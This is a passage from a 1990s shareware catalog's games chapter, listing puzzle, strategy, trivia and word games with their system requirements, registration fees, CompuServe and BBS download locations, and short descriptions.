+ Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; PEG.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1705 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + No one really knows when PEG solitaire was invented. Some + stories trace it to prisoners during the French Revolution, but + published descriptions date at least 100 years earlier. Most + likely the game is even older. This presents variations on the + classic peg solitaire with multiple starting positions, and + varying endgames. One of the pleasures of playing the game on + your computer is that you can quickly set up the board to try + different strategies. Ages 8 to 88. + + + Product: PentaBlox + Author: , +44-(0)1892-531108 + Version: 1.01 (08-08-94) + Needs: IBM AT (80286), Windows 3.0 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-12.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on upgrades. 12-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: PENTA101.ZIP on BBSs. + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A puzzle for Windows based on a series of twelve unique shapes + described as pentominoes by Solomon Golomb. The challenge is to + find as many of the 2,339 unique soultions as possible to the 6 + x 10 puzzle. Each solution can be saved to disk, where the + program automatically checks for identical solutions, and can + be sent to the user's printer. The program features full mouse + and keyboard support with full animation of the moving pieces. + Also included is an optional grid and a moveable SpeedBar. + + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 517. + + Chapter 17, "Games" 615 + + + + Product: Super VGA Puzzle + Author: , 206-523-6135 + Version: 2.04 (05-14-94) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Mouse. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; PUZ.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + SWREG#: 1709 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Stunning images from around the world in SuperVGA color! The + ultimate puzzle game. Extremely flexible - choose any numbers + of pieces from 4 to 2000! Hall of fame for your best scores. + Save puzzles, solution hints, simple mouse interface, and much + more! Designed to use all major SVGA boards in 800 x 600 mode, + but also will work on VGA or EGA if needed. All puzzles use + original photography. + + + Product: Swimsuit + Glamour photography puzzle game. See full description on + page 510. + + Product: Tangram + Author: , +972-2-830-001 + Version: 1.1 (04-15-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 5); disks + of other shareware; discounts on upgrades. + Look for: TANGRM11.ZIP on BBSs; TANGRM.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 100274,205 for + assistance). + SWREG#: 2464 + PsL#: 11293 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + The ancient Chinese jigsaw puzzle game. Unlike western jigsaw + puzzles, Tangram puzzles all use the same 7 pieces, from which + hundreds of forms can be created. Can be used for design, + inspiration, unlocking your imagination and just plain fun. + Comes with 50 puzzles to solve, built in screen saver, 360 + + Chapter 17, "Games" 616 + + + + degree piece control, 1/4 million color VGA support, save your + own puzzles and more! The endless possibilities have intrigued + people for centuries. Try solving a puzzle or two and see why. + + + Product: WINZLE + Author: , 206-523-6135 + Version: 1.10 (09-15-95) + Needs: IBM PC, DOS 3.1 or better. VGA monitor; Mouse. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; WINZLE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + SWREG#: 2958 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Stunning images from around the world in SuperVGA color! The + ultimate Windows puzzle game. Extremely flexible - choose any + numbers of pieces from 4 to 2000! Hall of fame for your best + scores. Save puzzles, solution hints, simple mouse interface, + and much more! All puzzles use original photography. + + + Product: XFIRE: Action Puzzle game + Author: , 206-523-6135 + Version: 1.02 (11-30-93) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk; Mouse. + Strongly recommended: EMS memory; XMS memory; sound card. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of unlimited phone, CompuServe, + mail support; bonus data; bonus graphics; bonus game hints; + disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; XFIRE.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1710 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An action puzzle game: you start with a scrambled version of a + picture with moving pieces. Click on a puzzle piece to set the + crosshairs. Any pieces belonging on those axes, snap into + place. If only 1 piece remains on a row or column it pops into + place, too. Includes SoundBlaster special effects. You get + points for completing the puzzle in the shortest time, and for + completing rows and columns quickly. + + Chapter 17, "Games" 617 + + + + 17.12 Sayings & stories + + Product: Crowndale Tales : ESCAPE! + Author: , 713-346-1552 + Version: 1.0 (08-17-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. MCI services installed. + Strongly recommended: SVGA monitor. + Registration fee: $15.00 (add $4.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited fax, CompuServe, mail support; bonus data; + all ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. + Look for: ESCAPE.ZIP on BBSs; ESCAPE.ZIP on CompuServe in + CIS:EFORUM forum LIBrary 0 (or contact userID 72435,40 for + assistance). + SWREG#: 6610 + Download size: 13500k (about 1002 minutes with a 2400 baud modem) + Description: + For the animal in all of us. ESCAPE! is the first tale in a + collection called Crowndale Tales. The tale is sophisticated + enough to appeal to an adult while simple enough in context for + a child. In the story, a wounded and helpless dove faces the + challenge of outwiting a cunning hyena. + + + Product: PC-Fortune + A no-repetition "fortune cookie" program. See full description + on page 262. + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 609. + + + 17.13 Simulators + + Product: MAZE3 + Author: , 904-574-0920 + Version: 3.0.6 (01-19-89) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $12.00 + Registration benefits: 12 months of fax, BBS, CompuServe, GEnie, + mail support; 2-month return policy; bonus utilities; bonus + game hints; all ASP-wide offers (see page 5); disks of other + + Chapter 17, "Games" 618 + + + + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: MAZE306.ZIP on BBSs (call 904-386-8693 to download it + at no charge); MAZ3.EXE on CompuServe in CIS:PCNEW forum + LIBrary 6 (or contact userID 72571,3352 for assistance). + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Lets you create a unigue maze of any size and then explore it. + You see realistic 3D views of the interior of the maze. Maze + provides advanced pallete switching graphics for EGA/VGA + adpaters but Maze will even work on non-graphics adapters in a + special character graphics mode. You explore the maze using a + compass and dropping markers to find your way. You may print a + complete map of the maze when you quit or find your way out of + the maze. + + + Product: WALL STREET RAIDER + Stock market/corporate takeover simulation. See full + description on page 623. + + 17.13.1 Sports + + Product: BassMap + Author: + Version: 1.3 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; CGA monitor. + Strongly recommended: EGA monitor. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; all ASP-wide + offers (see page 5). + Look for: BASSMP13.ZIP on BBSs (call 508-788-6951 to download it + at no charge); BASSMP.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 6 (or contact userID 71020,2613 for assistance). + Download size: 84k (about six minutes with a 2400 baud modem) + Description: + A utility that works with the fishing games BassTour, BassClass + and BassDuel. You can edit any existing lakes or create your + own lakes from scratch. Includes versions for CGA and EGA/VGA + systems. + + + Product: A Day at the Races + A betting horse racing game. See full description on page 621. + + Chapter 17, "Games" 619 + + + + 17.14 Star Trek & Star Wars + + Product: EGATrek + Author: + Version: 3.1 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. + Look for: EGATRK31.ZIP on BBSs (call 508-788-6951 to download it + at no charge); EGATRK.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 7 (or contact userID 71020,2613 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + 1988 winner, Public Brand Software contests for useful + programs. + Description: + A colorful, hi-res version of the classic computer game. The + player is put in control of a powerful starship in a battle to + save the universe. The computer screen simulates the captain's + command console with scanners, messages, damage control and + even a view outside the ship. Score is based on the time needed + to complete the mission with bonuses for rescues, ships + destroyed, etc. Supports only 640x350 16 color graphics. + + + 17.15 Strategy/simulation + + Product: Ancient Yacht + Author: + Version: 1.0 (01-06-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $4.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 12 months of mail support. 3-month return + policy. + Look for: availability unknown on BBSs; YT.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 12 (or contact userID 74453,2112 for + assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Try it and you'll agree, you've never played yahtzee like this + before. An ancient scroll and stone cup sit on a marble table + waiting for your play. Click on the cup and it shakes, and + spills the dice onto the table where they roll across the + tabletop with accompanying sound effects. This is a dice game + of luck and strategy similar to Yahtzee but based on the + original game of Yacht. Full on-line help, and the option to + turn sound effects on and off. + + Chapter 17, "Games" 620 + + + + Product: ATC: Air Traffic Controller + Author: , 206-523-6135 + Version: 1.0 (09-29-85) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; disks of + other shareware; discounts on other products. + Look for: ATC.ZIP on BBSs; ATC.ZIP on CompuServe in CIS:PCNEW + forum LIBrary 6 (or contact userID 76703,3046 for assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + An air traffic controller game that's perfect for a few minutes + or hours of fun. Easy to learn, but difficult to master. The + game tracks best scores at each of 20 levels of difficulty. + Ages 10 and up. + + + Product: BATTLE CHARGE [***] + Author: , 612-906-0955 + Version: 1.04 (10-07-95) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk; math coprocessor. + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 5). + Lifetime free upgrading allowed. + Look for: BTC100.ZIP on BBSs; BTC.ZIP on CompuServe in CIS:GAMERS + forum LIBrary 7 (or contact userID 73423,3415 for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A two-player strategy game played on a grid with two sets of + opposing (red vs. blue) neutral and charged pieces. A player + moves by choosing an initial velocity for one of his pieces, + which then follows a trajectory influenced (for a charged + piece) by the distribution of other charges on the board. The + motion ends following a collision with another piece. The game + ends when a charged piece captures (collides with) its opposing + king. + + Chapter 17, "Games" 621 + + + + Product: Border + Author: , 206-523-6135 + Version: 1.1 (02-23-89) + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Registration fee: $20.00 + Registration benefits: 3 months of phone, CompuServe support. + Look for: BORDER.ZIP on BBSs; BORDER.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A combination of GO and connect the dots, this abstract + strategy game for 2 players involves enclosing more area than + your opponent, while preventing them from stopping you. Ages 12 + and up. + + + Product: COLOR CROSS [***] + Author: , 612-906-0955 + Version: 1.05 (10-07-95) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + 3-month return policy. Lifetime free upgrading allowed. + Look for: CLRX1.ZIP on BBSs (call 701-772-5399 to download it at + no charge); CLX.ZIP on CompuServe in CIS:GAMERS forum LIBrary 7 + (or contact userID 73423,3415 for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A unique, abstract and kinetic two-player strategy game played + on a grid of gray and colored terrain squares. On a given turn, + a player sets a sequence of up to four pieces in motion, which + interact with existing terrain and modify it by leaving colored + trails. Collisions between pieces cause opposing pieces to + freeze and allied pieces to thaw (if frozen) and move. The game + ends when all of one player's pieces are frozen. Players may + edit and save any existing board configuration. + + Chapter 17, "Games" 622 + + + + Product: A Day at the Races + Author: + Version: 1.1 (10-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 12 months of CompuServe, mail support; + 3-month limited return policy. + Look for: availability unknown on BBSs; HORSE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 74453,2112 for + assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Test your betting skills and luck on an exciting animated horse + racing game for up to four players. Choose one of eight horses + to win, place or show, based on posted odds which influence the + horses' performances. Create your own voice overlays and hear + yourself introduce the races. Also included are a full on-line + help, the option to toggle voices on and off, and to change the + speed of the race. + + + Product: The Deer Expert + Gives methods for whitetail deer hunting,logs. See full + description on page 552. + + Product: Ecomaster + Ecology strategy game. See full description on page 478. + + Product: Econ's Arena + Fantasy chess-like strategy game. See full description on + page 599. + + Product: The Fish Expert + Finds fishing techniques; log, library tools. See full + description on page 553. + + Chapter 17, "Games" 623 + + + + Product: GREEN + Author: , 206-523-6135 + Version: 1.11 (05-10-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + bonus data; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; GREENX.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 358 + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Help the planters as they work to prevent the pavers from + turning farms into parking lots. Pavers include mall + developers, real estate agents, clear-cut loggers and other + exploiters. There are several different maps, of varying + difficulty. You have the ability to plant hedges, add walls, + and to destroy pavement. Unique, yet similar in concept to + Populous and SimCity. + + + Product: Towers + Author: , 206-523-6135 + Version: 1.27 (02-20-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; TOWER.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 318 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + How high can you build? Similar to Tetris, since you need to + place blocks of varying size. That's where the similarity ends + - you need logic and planning, rather than quick reflexes. You + build one level of the tower at a time, trying to fit the + blocks in the tightest pattern. Each level becomes the base + for the next level. Uses Cascoly's unique 3-D perspective + graphics to show fantastic detail. As you scroll from side to + side, the perspective changes. + + Chapter 17, "Games" 624 + + + + Product: WALL STREET RAIDER + Author: , 206-391-4036 + Version: 4.2 (04-30-94) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Hard disk. Does not + run on IBM PCjr. + Strongly recommended: CGA monitor. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; discounts on other products. 1 free update disk(s) + sent out. + Look for: WSR4_2.ZIP on BBSs (call 703-680-9269 to download it at + no charge). + Download size: 455k (about 34 minutes with a 2400 baud modem) + Description: + A high-stakes, nonstop game of corporate finance, with "live" + stock ticker, where 1-4 players (& computer) battle for profits + in an amazingly realistic simulation. Has 250 companies in 36 + industry groups, each trying to dominate its own industry and + crush the competition, while players seek to get rich, do + takeovers, greenmail, LBO's, mergers, issue junk bonds (and + play dirty) to grasp and control the world's largest + corporations, from Exxon on down. The ultimate in realistic + stock market games! + + + Product: WEBS + Author: , 206-523-6135 + Version: 1.2 (06-11-92) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; WEBS.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1707 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A deceptively simple solitaire game requiring both strategy and + cunning. You claim nodes on a web while trying to limit the + moves available to your opponent. Automatic display of + potential moves, a variety of webs and difficulties give hours + of challenge. + + + Product: XFIRE: Action Puzzle game + Action Puzzle game. See full description on page 616. + + Chapter 17, "Games" 625 + + + + 17.15.1 War games + + Product: Declaration of War + Author: , 312-922-6313 + Version: 1.1 (08-15-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $39.95 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; bonus data; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: DOWAR11.ZIP on BBSs (call 312-922-2839 to download it + at no charge); DOWAR*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 18 (or contact userID 71532,3271 for assistance). + SWREG#: 3242 + PsL#: 11535 + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + A Windows strategy/war game set in modern times. Allows for up + to six human or computer players, play- by-mail games, + handicapping with 24 strength levels, and 14 types of pieces. + On-line help. + + + Product: Medieval War + Author: , 312-922-6313 + Version: 1.5 (02-16-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $29.95 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; bonus data; discounts on other products; discounts on + upgrades. Lifetime free upgrading allowed. + Look for: MEDWAR12.ZIP on BBSs (call 312-922-2839 to download it + at no charge); MEDWA*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 18 (or contact userID 71532,3271 for assistance). + SWREG#: 4917 + Download size: 242k (about 18 minutes with a 2400 baud modem) + Description: + A Windows war/strategy game set in medieval times. Allows for + up to six human or computer players, play-by-mail games, + handicapping with 24 strength levels, and 14 different types of + pieces. On-line help. + + Chapter 17, "Games" 626 + + + + Product: Medieval War Door + BBS door game for medieval war/strategy. See full description + on page 376. + + + 17.16 Trivia + + Product: Have You Read That Movie? + Author: , 717-289-4019 + Version: 1.0 (04-01-91) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; disks of other + shareware. + Look for: LITQUIZ1.ZIP on BBSs. + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + An entertainment-educational program that tests the user's + knowledge of literature and film via a multiple-choice format. + 365+ questions (easy, medium & hard) about films based on + literary works. Each correct answer is accompanied by some + interesting fact(s) about the movie or literary work. Three + modes of play: Single Player, Two Players Alternate, and Two + Players Compete (quickest player answers). Many configuration + options. On-line help. Mouse or keyboard. + + + Product: On This Day + "What happened on this day in history?" See full description + on page 474. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 475. + + Product: Personal Challenge + Educational trivia game for 1-4 players. See full description + on page 467. + + Product: PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 630. + + Chapter 17, "Games" 627 + + + + 17.17 Word games + + Product: Cipher + Author: + Version: 2.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: EGA monitor; Hard disk; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus puzzles. + Look for: CIPHER22.ZIP on BBSs (call 508-788-6951 to download it + at no charge); CIPHER.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 104k (about eight minutes with a 2400 baud modem) + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode and allows you to + play using a mouse (text modes and keyboard are also + supported). Features include help, hints, save/restore. User + can create their own puzzle files from either plain text quotes + or from already encrypted quotes. + + + Product: Cipher for Windows + Author: + Version: 1.1 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus puzzles. + Look for: CIPHWN11.ZIP on BBSs (call 508-788-6951 to download it + at no charge); CIPHWN.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 112k (about nine minutes with a 2400 baud modem) + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode under the Microsoft + Windows 3.x environment and allows you to play using a mouse. + Features include standard Windows style hypertext help, hints, + save/restore. User can also create their own puzzle files from + plain text or already encrypted quotes. + + Chapter 17, "Games" 628 + + + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 197. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 197. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 462. + + Product: EGAWHEEL + Author: + Version: V.1.91 (12-18-93) + Needs: IBM PC, DOS 2.11 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support; bonus data. + Look for: availability unknown on BBSs; EGAWHE.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 7 (or contact userID 76662,1623 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A "Wheel of Fortune"/hangman type of word guessing game for IBM + compatible computers with EGA video card and monitor. The game + features: a colorful spinning wheel, 1-3 players, 6 rounds of + play, a sound on/off option, optional mouse, automatic win + after all letters of the puzzle are bought and guessed, a high + score table for the top ten WHEELERS, and an editor to add/ + delete/modify puzzles. The editor may be used to create a + custom database for a teaching aid from grade school through + college. + + + Product: Fictionary + Author: , 206-523-6135 + Version: 1.32 (04-30-90) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; FICT.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 8 (or contact userID 76703,3046 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + The game of fantastic and farfetched definitions. Each round a + player chooses a word. You can choose your own word or pick one + from the large selection included with the game. Each other + + Chapter 17, "Games" 629 + + + + player makes up their own definition for the word. Everyone + votes for the word they think is correct and points are scored + for guessing the proper one, or misleading other players. Great + vocabulary builder. Can be played by 1-6. + + + Product: Hang Man + Author: , 312-922-6313 + Version: 1.1 (08-16-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: HANMAN10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); HANMA*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 14 (or contact userID 71532,3271 for assistance). + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + A Windows word game for adults and children. The object is to + guess the word before the hang man is complete. On-line help. + + + Product: HANG4.ZIP + Author: + Version: 4.1 (12-08-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; SVGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; lifetime return + policy; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. 99 free update disk(s) sent out. + Look for: availability unknown on BBSs; HANG4.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 8 (or contact userID 70534,1447 for + assistance). + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + The latest of my Hangman series. 8 configureable word files, 2 + included. Make, edit, & view all word files from easy menus. + Options: PC-sound on/off, peek, hints, scorecards,and much + more! Online help is everywhere with a mouse click or the F1 + key. Excellent for foreign languages too. Educational as well + as just fun. + + Chapter 17, "Games" 630 + + + + Product: HangWin + Author: + Version: 2.04 (07-15-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor. + Registration fee: $11.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus data; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; HNGWIN.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 4 (or contact userID 72614,43 for + assistance). + Download size: 256k (about 19 minutes with a 2400 baud modem) + Description: + The traditional hangman word game. Guess the word (or phrase) + before the prisoner hangs. Word puzzles are randomly chosen + from a dictionary. The dictionary may be user-defined. For + fun, the user may choose the prisoner. The prisoner's face is + animated. Can use Window-supported sound boards and also + includes an easy-to-use installation utility and extensive on- + line help. + + + Product: PHRASE.ZIP + Author: + Version: 1.0 (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; SVGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; lifetime return + policy; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. 99 free update disk(s) sent out. + Look for: availability unknown on BBSs; PHRASE.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 8 (or contact userID 70534,1447 for + assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A new & different type of game. A combination of hangman & + wheel of fortune. User can make five phrase files from easy + menus, 